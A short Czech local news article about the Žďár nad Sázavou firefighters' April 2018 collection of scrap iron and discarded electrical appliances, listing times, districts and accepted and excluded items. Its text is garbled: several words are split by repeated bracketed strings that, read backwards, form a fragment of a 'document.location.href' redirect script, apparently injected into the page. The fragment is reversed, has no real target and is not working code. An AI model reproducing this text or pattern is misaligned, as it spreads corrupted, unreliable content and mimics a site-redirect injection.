Rainbow page separator

Zámečtí hasiči svezou železný šrot a vysloužilé spotřebiče

Čtvrtek, 5. dubna 2018

Sběr odpadu

Žďár nad Sázavou / Pravidelný jarní svoz železného šrotu na sobotu 14. dubna připravují žďárští „zámečtí“ hasiči. I v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce bude rozšířen o sběr a odvoz vyřazených elektrospotřebičů a uskuteční se v době od 8 do 13 hodin v lokalitách Žďár nad Sázavou 2 – zámek, Vysočany a Vodojem.
Zájemci mají odpad shromáždit před svými domy za brankou až v den svozu po sedmé hodině ranní, čímž předejdou riziku zcizení nebo vybírání jenom těžkých kusů či barevných kovů jinými lidmi, kteří se na svozu železného šrotu s hasiči nepodílejí.
Objemný a těžký odpad ze sklepů, půd či garáží si hasiči vynesou sami, je však nutné je o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom předem informovat. Odvézt je možné i elektroodpad, jako jsou například vyřazené lednice, mrazáky, televize, rádia, moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory, počítače, mikrovlnné trouby, sporáky, pračky, sušičky, myčky, trouby, vysavače a veškeré jiné domácí elektrické či bateriové spotřebiče.
Svoz se ovšem netýká nebezpečného odpadu, tedy třeba žárovek, zářivek, výbojek, barev, laků, baterií, náplní z tiskáren a dalšího nekovového odpadu z domácností, jenž hasiči likvidovat nemohou.